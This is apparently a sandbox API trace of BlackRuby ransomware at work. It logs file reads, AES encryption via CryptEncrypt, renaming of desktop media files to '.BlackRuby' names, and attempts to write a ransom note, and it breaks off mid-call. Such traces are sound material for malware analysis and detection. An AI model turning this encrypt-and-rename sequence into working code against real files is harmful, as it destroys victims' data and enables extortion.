1 [0056.014] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.014] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0056.014] GetLastError () returned 0x0 [0056.014] SetErrorMode (uMode=0x1) returned 0x0 [0056.014] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.016] GetLastError () returned 0xb7 [0056.016] GetFileType (hFile=0x184) returned 0x1 [0056.016] SetErrorMode (uMode=0x0) returned 0x1 [0056.016] GetFileType (hFile=0x184) returned 0x1 [0056.017] CloseHandle (hObject=0x184) returned 1 [0056.017] GetLastError () returned 0xb7 [0056.017] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0056.017] GetLastError () returned 0xb7 [0056.017] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_9rueOsmOVMYVmPXdprgeaeeqnaFLPswohTYqPhhAz.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_9rueOsmOVMYVmPXdprgeaeeqnaFLPswohTYqPhhAz.BlackRuby", lpFilePart=0x0) returned 0x56 [0056.017] GetLastError () returned 0xb7 [0056.017] SetErrorMode (uMode=0x1) returned 0x0 [0056.017] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bfc0050, ftCreationTime.dwHighDateTime=0x1d3585a, ftLastAccessTime.dwLowDateTime=0xc6c2d2a0, ftLastAccessTime.dwHighDateTime=0x1d359ac, ftLastWriteTime.dwLowDateTime=0x2994b9a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7b30)) returned 1 [0056.017] GetLastError () returned 0xb7 [0056.017] SetErrorMode (uMode=0x0) returned 0x1 [0056.017] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_9rueOsmOVMYVmPXdprgeaeeqnaFLPswohTYqPhhAz.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_9rueosmovmyvmpxdprgeaeeqnaflpswohtyqphhaz.blackruby")) returned 1 [0056.018] GetLastError () returned 0xb7 [0056.018] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.018] GetLastError () returned 0xb7 [0056.018] SetErrorMode (uMode=0x1) returned 0x0 [0056.018] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.018] GetLastError () returned 0x5 [0056.019] SetErrorMode (uMode=0x0) returned 0x1 [0056.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", lpFilePart=0x0) returned 0x27 [0056.019] GetLastError () returned 0x5 [0056.019] SetErrorMode (uMode=0x1) returned 0x0 [0056.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k3q24wtta0.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1c66464 | out: lpFileInformation=0x1c66464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e486d50, ftCreationTime.dwHighDateTime=0x1d354a2, ftLastAccessTime.dwLowDateTime=0xfcab0c0, ftLastAccessTime.dwHighDateTime=0x1d35a58, ftLastWriteTime.dwLowDateTime=0xfcab0c0, ftLastWriteTime.dwHighDateTime=0x1d35a58, nFileSizeHigh=0x0, nFileSizeLow=0xba1)) returned 1 [0056.019] GetLastError () returned 0x5 [0056.019] SetErrorMode (uMode=0x0) returned 0x1 [0056.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", lpFilePart=0x0) returned 0x27 [0056.019] GetLastError () returned 0x5 [0056.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", lpFilePart=0x0) returned 0x27 [0056.019] GetLastError () returned 0x5 [0056.019] SetErrorMode (uMode=0x1) returned 0x0 [0056.020] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k3q24wtta0.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.020] GetLastError () returned 0x0 [0056.020] GetFileType (hFile=0x184) returned 0x1 [0056.020] SetErrorMode (uMode=0x0) returned 0x1 [0056.020] GetFileType (hFile=0x184) returned 0x1 [0056.020] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xba1 [0056.020] GetLastError () returned 0x0 [0056.020] ReadFile (in: hFile=0x184, lpBuffer=0x1c68a84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c68a84*, lpNumberOfBytesRead=0x18ed84*=0xba1, lpOverlapped=0x0) returned 1 [0056.020] GetLastError () returned 0x0 [0056.021] CloseHandle (hObject=0x184) returned 1 [0056.021] GetLastError () returned 0x0 [0056.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", lpFilePart=0x0) returned 0x27 [0056.021] GetLastError () returned 0x0 [0056.021] SetErrorMode (uMode=0x1) returned 0x0 [0056.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k3q24wtta0.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e486d50, ftCreationTime.dwHighDateTime=0x1d354a2, ftLastAccessTime.dwLowDateTime=0xfcab0c0, ftLastAccessTime.dwHighDateTime=0x1d35a58, ftLastWriteTime.dwLowDateTime=0xfcab0c0, ftLastWriteTime.dwHighDateTime=0x1d35a58, nFileSizeHigh=0x0, nFileSizeLow=0xba1)) returned 1 [0056.021] GetLastError () returned 0x0 [0056.021] SetErrorMode (uMode=0x0) returned 0x1 [0056.031] CryptImportKey (in: hProv=0x37c708, pbData=0x1cc49c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0056.031] GetLastError () returned 0x0 [0056.031] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.031] GetLastError () returned 0x0 [0056.036] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x3609e0) returned 1 [0056.036] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1cf1a14*=0x1, dwFlags=0x0) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1cf19e0, dwFlags=0x0) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf1a5c*, pdwDataLen=0x18ed74*=0xca0, dwBufLen=0xca0 | out: pbData=0x1cf1a5c*, pdwDataLen=0x18ed74*=0xca0) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf33c8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cf33c8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cf33f8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cf33f8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.036] GetLastError () returned 0x0 [0056.036] CryptDestroyKey (hKey=0x360ce0) returned 1 [0056.036] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.036] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.036] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp", lpFilePart=0x0) returned 0x27 [0056.036] GetLastError () returned 0x0 [0056.037] SetErrorMode (uMode=0x1) returned 0x0 [0056.037] GetFileType (hFile=0x184) returned 0x1 [0056.037] GetFileType (hFile=0x184) returned 0x1 [0056.039] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\K3Q24wtTa0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k3q24wtta0.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_viwsSvMCqzFoEJtOy9st8b5R2zNKFEKistal.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_viwssvmcqzfoejtoy9st8b5r2znkfekistal.blackruby")) returned 1 [0056.039] GetLastError () returned 0xb7 [0056.040] SetErrorMode (uMode=0x0) returned 0x1 [0056.040] GetFileType (hFile=0x184) returned 0x1 [0056.040] GetFileType (hFile=0x184) returned 0x1 [0056.040] ReadFile (in: hFile=0x184, lpBuffer=0x1d1566c, nNumberOfBytesToRead=0xd5bb, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d1566c*, lpNumberOfBytesRead=0x18ed84*=0xd5bb, lpOverlapped=0x0) returned 1 [0056.041] GetLastError () returned 0x0 [0056.078] CryptImportKey (in: hProv=0x37c790, pbData=0x1b97cc8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0056.078] GetLastError () returned 0x0 [0056.078] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.078] GetLastError () returned 0x0 [0056.083] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.083] GetLastError () returned 0x0 [0056.083] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0056.083] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.083] GetLastError () returned 0x0 [0056.083] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1bc4d14*=0x1, dwFlags=0x0) returned 1 [0056.083] GetLastError () returned 0x0 [0056.083] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1bc4ce0, dwFlags=0x0) returned 1 [0056.083] GetLastError () returned 0x0 [0056.084] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc4d5c*, pdwDataLen=0x18ed74*=0xd6b0, dwBufLen=0xd6b0 | out: pbData=0x1bc4d5c*, pdwDataLen=0x18ed74*=0xd6b0) returned 1 [0056.084] GetLastError () returned 0x0 [0056.084] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdfae8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bdfae8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.084] GetLastError () returned 0x0 [0056.084] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdfb18*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bdfb18*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.084] GetLastError () returned 0x0 [0056.085] CryptDestroyKey (hKey=0x360d20) returned 1 [0056.085] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.085] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.085] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv", lpFilePart=0x0) returned 0x2c [0056.085] GetLastError () returned 0x0 [0056.085] SetErrorMode (uMode=0x1) returned 0x0 [0056.085] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv" (normalized: "c:\\users\\eebsym5\\desktop\\opacxrpehkapdid.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.086] GetLastError () returned 0xb7 [0056.086] GetFileType (hFile=0x184) returned 0x1 [0056.086] SetErrorMode (uMode=0x0) returned 0x1 [0056.086] GetFileType (hFile=0x184) returned 0x1 [0056.088] CloseHandle (hObject=0x184) returned 1 [0056.088] GetLastError () returned 0xb7 [0056.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv", lpFilePart=0x0) returned 0x2c [0056.088] GetLastError () returned 0xb7 [0056.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_2NZrYpu3HpR8M1FQCys2iqtUxdZsDfUBeiwSZ4.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_2NZrYpu3HpR8M1FQCys2iqtUxdZsDfUBeiwSZ4.BlackRuby", lpFilePart=0x0) returned 0x53 [0056.088] GetLastError () returned 0xb7 [0056.088] SetErrorMode (uMode=0x1) returned 0x0 [0056.088] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv" (normalized: "c:\\users\\eebsym5\\desktop\\opacxrpehkapdid.flv"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40aec20, ftCreationTime.dwHighDateTime=0x1d35260, ftLastAccessTime.dwLowDateTime=0x76120120, ftLastAccessTime.dwHighDateTime=0x1d34f91, ftLastWriteTime.dwLowDateTime=0x29a0a080, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd6c0)) returned 1 [0056.088] GetLastError () returned 0xb7 [0056.088] SetErrorMode (uMode=0x0) returned 0x1 [0056.088] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\OpACXRpehKApdiD.flv" (normalized: "c:\\users\\eebsym5\\desktop\\opacxrpehkapdid.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_2NZrYpu3HpR8M1FQCys2iqtUxdZsDfUBeiwSZ4.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_2nzrypu3hpr8m1fqcys2iqtuxdzsdfubeiwsz4.blackruby")) returned 1 [0056.089] GetLastError () returned 0xb7 [0056.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.090] GetLastError () returned 0xb7 [0056.090] SetErrorMode (uMode=0x1) returned 0x0 [0056.090] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.090] GetLastError () returned 0x5 [0056.090] SetErrorMode (uMode=0x0) returned 0x1 [0056.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.091] GetLastError () returned 0x5 [0056.091] SetErrorMode (uMode=0x1) returned 0x0 [0056.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1c0a2dc | out: lpFileInformation=0x1c0a2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aee75a0, ftCreationTime.dwHighDateTime=0x1d34b41, ftLastAccessTime.dwLowDateTime=0x8d13a040, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0x8d13a040, ftLastWriteTime.dwHighDateTime=0x1d35991, nFileSizeHigh=0x0, nFileSizeLow=0x6a44)) returned 1 [0056.091] GetLastError () returned 0x5 [0056.091] SetErrorMode (uMode=0x0) returned 0x1 [0056.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.091] GetLastError () returned 0x5 [0056.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.091] GetLastError () returned 0x5 [0056.091] SetErrorMode (uMode=0x1) returned 0x0 [0056.091] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.091] GetLastError () returned 0x0 [0056.091] GetFileType (hFile=0x184) returned 0x1 [0056.091] SetErrorMode (uMode=0x0) returned 0x1 [0056.091] GetFileType (hFile=0x184) returned 0x1 [0056.091] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x6a44 [0056.091] GetLastError () returned 0x0 [0056.092] ReadFile (in: hFile=0x184, lpBuffer=0x1c0c378, nNumberOfBytesToRead=0x6a44, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c0c378*, lpNumberOfBytesRead=0x18ed84*=0x6a44, lpOverlapped=0x0) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] CloseHandle (hObject=0x184) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.092] GetLastError () returned 0x0 [0056.092] SetErrorMode (uMode=0x1) returned 0x0 [0056.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aee75a0, ftCreationTime.dwHighDateTime=0x1d34b41, ftLastAccessTime.dwLowDateTime=0x8d13a040, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0x8d13a040, ftLastWriteTime.dwHighDateTime=0x1d35991, nFileSizeHigh=0x0, nFileSizeLow=0x6a44)) returned 1 [0056.093] GetLastError () returned 0x0 [0056.093] SetErrorMode (uMode=0x0) returned 0x1 [0056.093] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0056.093] GetLastError () returned 0x0 [0056.126] CryptImportKey (in: hProv=0x37c680, pbData=0x1c73bb4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0056.126] GetLastError () returned 0x0 [0056.126] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.126] GetLastError () returned 0x0 [0056.131] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.131] GetLastError () returned 0x0 [0056.131] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0056.131] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.131] GetLastError () returned 0x0 [0056.131] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1ca0c00*=0x1, dwFlags=0x0) returned 1 [0056.131] GetLastError () returned 0x0 [0056.131] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1ca0bcc, dwFlags=0x0) returned 1 [0056.131] GetLastError () returned 0x0 [0056.131] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca0c48*, pdwDataLen=0x18ed74*=0x6b40, dwBufLen=0x6b40 | out: pbData=0x1ca0c48*, pdwDataLen=0x18ed74*=0x6b40) returned 1 [0056.132] GetLastError () returned 0x0 [0056.132] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cae2f4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cae2f4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.132] GetLastError () returned 0x0 [0056.132] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cae324*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cae324*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.132] GetLastError () returned 0x0 [0056.132] CryptDestroyKey (hKey=0x360da0) returned 1 [0056.132] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.132] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.132] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.132] GetLastError () returned 0x0 [0056.132] SetErrorMode (uMode=0x1) returned 0x0 [0056.132] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.133] GetLastError () returned 0xb7 [0056.134] GetFileType (hFile=0x184) returned 0x1 [0056.134] SetErrorMode (uMode=0x0) returned 0x1 [0056.134] GetFileType (hFile=0x184) returned 0x1 [0056.135] CloseHandle (hObject=0x184) returned 1 [0056.135] GetLastError () returned 0xb7 [0056.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4", lpFilePart=0x0) returned 0x2b [0056.135] GetLastError () returned 0xb7 [0056.135] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_oEb6csUrbS9RoubBKE5GFmJ6B4hr52r5p8yNb7f9i1zZw.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_oEb6csUrbS9RoubBKE5GFmJ6B4hr52r5p8yNb7f9i1zZw.BlackRuby", lpFilePart=0x0) returned 0x5a [0056.135] GetLastError () returned 0xb7 [0056.135] SetErrorMode (uMode=0x1) returned 0x0 [0056.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aee75a0, ftCreationTime.dwHighDateTime=0x1d34b41, ftLastAccessTime.dwLowDateTime=0x8d13a040, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0x29a7c4a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6b50)) returned 1 [0056.135] GetLastError () returned 0xb7 [0056.135] SetErrorMode (uMode=0x0) returned 0x1 [0056.135] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\rDiNLNLFYceJ68.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\rdinlnlfycej68.mp4"), 